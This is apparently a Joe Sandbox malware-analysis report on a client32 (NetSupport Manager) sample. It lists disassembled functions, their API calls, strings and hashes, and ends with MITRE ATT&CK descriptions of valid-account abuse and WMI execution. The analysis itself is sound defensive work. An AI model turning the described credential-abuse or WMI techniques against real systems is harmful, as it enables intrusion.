Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitItemLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2046328329-2830328467
Opcode ID: e23e6f8f1d795151bf65504b549d0b3e99ba60d83445b273e5f7e54ace8b4032
Instruction ID: d6c174be7095a88acf08c8c7035f1bfcc606cf11c581344454f7ad96a18f94da
Opcode Fuzzy Hash: e23e6f8f1d795151bf65504b549d0b3e99ba60d83445b273e5f7e54ace8b4032
Instruction Fuzzy Hash: 68E01AB6610269AFD714DE85EC80EE7B3ACAB48794F008429FA5997240D6B0E95087A1

Function 11001040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 11001073

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11001056
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 819365019-2830328467
Opcode ID: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
Instruction ID: 2149dfb7d7fad2f484445a2ad992c90f1569e5591f5ea3f8663e4569b2fc6047
Opcode Fuzzy Hash: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
Instruction Fuzzy Hash: 6EE086B5A00359BFD710DE45DCC5FD7B3ACEF54765F008429F95987240D6B0E99087A1

Function 110010D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(?,?,?,?), ref: 11001103

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 110010E6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastPostProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 906220102-2830328467
Opcode ID: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
Instruction ID: 526bb494f44a88d6c72e7bb0fbd3121225ec46d2648d8932a1e0f472dc4001e3
Opcode Fuzzy Hash: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
Instruction Fuzzy Hash: F9E086B5A0021DBFD710DE45DC85FD7B3ACEB48764F008429FA1487600DAB0F950C7A0

Function 1101D070 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

MapWindowPoints.USER32(00000000,?,?,00000001), ref: 1101D09F

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 1101D086
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D081

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessagePointsProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2663631564-2830328467
Opcode ID: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
Instruction ID: 9c4b2b82cd9adc94e853c670648ed6e4092ddceab183af3ebe85ec827fccdc52
Opcode Fuzzy Hash: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
Instruction Fuzzy Hash: 8FE0C2B1640319BBD210DA41EC86FE6B39C8B10765F008039F61856580D9B0A98087A1

Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 1100113B

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11001126
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1604732272-2830328467
Opcode ID: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
Instruction ID: 23928ab379678a07e0f3a28c7a56dac56e7f9ec3f6936ec539a74ac81f8319a0
Opcode Fuzzy Hash: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
Instruction Fuzzy Hash: 4FD02BB5A1032DABC314CA41DC81FD2F3AC9B103A4F004039F62442100D571E540C394

Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,?), ref: 1100102B

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11001016
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-2830328467
Opcode ID: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
Instruction ID: ee2bff440c1eeb311b517f53df1393b18d0186c38d15746519086ed5f67e1e1e
Opcode Fuzzy Hash: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
Instruction Fuzzy Hash: 50D02BB260032DABC310D641DC80FD2B3DCDB04364F008039FA5442140D670E4808390

Function 68C7BB00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 68C7BB2D

Strings

NSMString.cpp, xrefs: 68C7BB17
IsA(), xrefs: 68C7BB1C

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _free
String ID: IsA()$NSMString.cpp
API String ID: 269201875-2362537096
Opcode ID: 573f29e639b29df7e5f0c168c7a6365bfda3f62c4b6b1140092ed2891137a840
Instruction ID: 4ad38dd667b88ff058da723164fdd279f54cc6670590236ad80ab5ca787ced1c
Opcode Fuzzy Hash: 573f29e639b29df7e5f0c168c7a6365bfda3f62c4b6b1140092ed2891137a840
Instruction Fuzzy Hash: 15D0A7BA8441255FC9245A687C11D7933D40F0931DFC44465BE9C67100F75058C00192

Function 1110F3E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1110F3EA
SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 1110F400

Strings

MSOfficeWClass, xrefs: 1110F3E5

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FindMessageSendWindow
String ID: MSOfficeWClass
API String ID: 1741975844-970895155
Opcode ID: ea34c11dfc70926f791b8ca9d524af463d7492e780264d0d8388732ba29401cd
Instruction ID: 17eb5a188d88a84c71184668e46e9585b6c12665a03152ba016c754b78296158
Opcode Fuzzy Hash: ea34c11dfc70926f791b8ca9d524af463d7492e780264d0d8388732ba29401cd
Instruction Fuzzy Hash: 2BD0127035035977E6001AA2DD4EF99BB5CDB44B55F118024F706AA0C1DBB0B440876A

Function 68C7DAC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 68C7DAE4

Strings

Refcount.cpp, xrefs: 68C7DACE
this->hReadyEvent, xrefs: 68C7DAD3

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Event
String ID: Refcount.cpp$this->hReadyEvent
API String ID: 4201588131-2118820724
Opcode ID: 574f6164d156a17309fce9a33609fac148a998ff4dd162c68a809ce7e991a829
Instruction ID: c6f060b5ff9d5f76eef0f048d43565dccddd0ba3eea5b0315ef9c25aade0df23
Opcode Fuzzy Hash: 574f6164d156a17309fce9a33609fac148a998ff4dd162c68a809ce7e991a829
Instruction Fuzzy Hash: D6D02231884212EFC6208A24B80AFCE32B89B00329F408038F20A62004F6A0A88A8BC0

Function 1101D040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 1101D064

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 1101D053
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D04E

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMenuMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1590435379-2830328467
Opcode ID: c7b93495bf7068046200dc23c21ea9923ab35a6c9bf7b9f7b571f0dbc23fbce4
Instruction ID: a479ae3ba71ad1bbfd929d5f192baf473b643c420dccf9ee561c4944f6f7f77e
Opcode Fuzzy Hash: c7b93495bf7068046200dc23c21ea9923ab35a6c9bf7b9f7b571f0dbc23fbce4
Instruction Fuzzy Hash: 51D022B5E0023AABC320E611ECC8FC6B2A85B00318F044468F12062000E678E480C380

Function 11157350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 11157358
GetPropA.USER32(?,OldMenu), ref: 11157368

Strings

OldMenu, xrefs: 11157362

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MenuProp
String ID: OldMenu
API String ID: 601939786-3235417843
Opcode ID: bcb887040fc688b3d48361d640a276ef1f898a207ca6826fe873eb45f49f39ab
Instruction ID: 521654fc19124d4f771c6bc11addf53dd8358c346f2b3ea316e48a946e839c39
Opcode Fuzzy Hash: bcb887040fc688b3d48361d640a276ef1f898a207ca6826fe873eb45f49f39ab
Instruction Fuzzy Hash: 96C0123260653D7782421A959D85ACEF76CAD162653008062FA10A2100F724551187EA

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

